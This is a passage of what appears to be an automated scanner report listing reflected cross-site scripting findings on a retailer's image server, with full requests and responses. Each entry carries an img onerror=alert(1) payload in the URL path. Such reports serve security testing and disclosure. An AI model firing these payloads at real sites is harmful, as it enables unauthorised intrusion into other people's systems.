3.245. http://images3.pacsun.com/is/image/pacsunproducts/8905895_01_031 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8905895_01_031

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload bdbd8<img%20src%3da%20onerror%3dalert(1)>91425f070a7 was submitted in REST URL parameter 4 and was echoed as bdbd8<img src=a onerror=alert(1)>91425f070a7 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8905895_01_031bdbd8<img%20src%3da%20onerror%3dalert(1)>91425f070a7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8905895_01_031bdbd8<img src=a onerror=alert(1)>91425f070a7

3.246. http://images3.pacsun.com/is/image/pacsunproducts/8912289_01_041 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8912289_01_041

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload b9971<img%20src%3da%20onerror%3dalert(1)>788fd8aed58 was submitted in REST URL parameter 4 and was echoed as b9971<img src=a onerror=alert(1)>788fd8aed58 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8912289_01_041b9971<img%20src%3da%20onerror%3dalert(1)>788fd8aed58?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8912289_01_041b9971<img src=a onerror=alert(1)>788fd8aed58

3.247. http://images3.pacsun.com/is/image/pacsunproducts/8912289_sw_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8912289_sw_040

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload 7c120<img%20src%3da%20onerror%3dalert(1)>cbc595904a1 was submitted in REST URL parameter 4 and was echoed as 7c120<img src=a onerror=alert(1)>cbc595904a1 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8912289_sw_0407c120<img%20src%3da%20onerror%3dalert(1)>cbc595904a1?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8912289_sw_0407c120<img src=a onerror=alert(1)>cbc595904a1

3.248. http://images3.pacsun.com/is/image/pacsunproducts/8912289_sw_041 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8912289_sw_041

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload f8496<img%20src%3da%20onerror%3dalert(1)>8febe2ef8cb was submitted in REST URL parameter 4 and was echoed as f8496<img src=a onerror=alert(1)>8febe2ef8cb in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8912289_sw_041f8496<img%20src%3da%20onerror%3dalert(1)>8febe2ef8cb?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8912289_sw_041f8496<img src=a onerror=alert(1)>8febe2ef8cb

3.249. http://images3.pacsun.com/is/image/pacsunproducts/8913964_01_054 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8913964_01_054

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload a31a2<img%20src%3da%20onerror%3dalert(1)>2d612f92168 was submitted in REST URL parameter 4 and was echoed as a31a2<img src=a onerror=alert(1)>2d612f92168 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8913964_01_054a31a2<img%20src%3da%20onerror%3dalert(1)>2d612f92168?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8913964_01_054a31a2<img src=a onerror=alert(1)>2d612f92168

3.250. http://images3.pacsun.com/is/image/pacsunproducts/8913964_sw_004 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8913964_sw_004

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload 8189d<img%20src%3da%20onerror%3dalert(1)>c965a8f7656 was submitted in REST URL parameter 4 and was echoed as 8189d<img src=a onerror=alert(1)>c965a8f7656 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8913964_sw_0048189d<img%20src%3da%20onerror%3dalert(1)>c965a8f7656?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8913964_sw_0048189d<img src=a onerror=alert(1)>c965a8f7656

3.251. http://images3.pacsun.com/is/image/pacsunproducts/8913964_sw_054 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8913964_sw_054

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload a4224<img%20src%3da%20onerror%3dalert(1)>8c9adb198c2 was submitted in REST URL parameter 4 and was echoed as a4224<img src=a onerror=alert(1)>8c9adb198c2 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8913964_sw_054a4224<img%20src%3da%20onerror%3dalert(1)>8c9adb198c2?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8913964_sw_054a4224<img src=a onerror=alert(1)>8c9adb198c2

3.252. http://images3.pacsun.com/is/image/pacsunproducts/8916876_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8916876_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload 31850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0 was submitted in REST URL parameter 4 and was echoed as 31850<img src=a onerror=alert(1)>eae6ae15ce0 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8916876_0131850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8916876_0131850<img src=a onerror=alert(1)>eae6ae15ce0

3.253. http://images3.pacsun.com/is/image/pacsunproducts/8917569_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8917569_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the body of the application's error response. The payload f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998 was submitted in REST URL parameter 4 and was echoed as f8459<img src=a onerror=alert(1)>90c27eff998 in the 403 body.

The echoed markup carries an img onerror event handler, so any browser that renders this response as HTML executes attacker-supplied JavaScript. Caveat: the response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header. A browser that honours the declared type shows the markup as text, so the High/Certain rating holds only for clients that sniff the body as HTML; the missing output encoding is the underlying defect in either case.

Request

GET /is/image/pacsunproducts/8917569_01f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8917569_01f8459<img src=a onerror=alert(1)>90c27eff998

3.254. http://images3.pacsun.com/is/image/pacsunproducts/8928236_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8928236_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728 was submitted in the REST URL parameter 4. This input was echoed as cac81<img src=a onerror=alert(1)>08938a5b728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8928236_01cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:12 GMT
Connection: close

Unable to find /pacsunproducts/8928236_01cac81<img src=a onerror=alert(1)>08938a5b728

3.255. http://images3.pacsun.com/is/image/pacsunproducts/8930075_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8930075_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37c75<img%20src%3da%20onerror%3dalert(1)>443dd332700 was submitted in the REST URL parameter 4. This input was echoed as 37c75<img src=a onerror=alert(1)>443dd332700 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8930075_0137c75<img%20src%3da%20onerror%3dalert(1)>443dd332700?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f"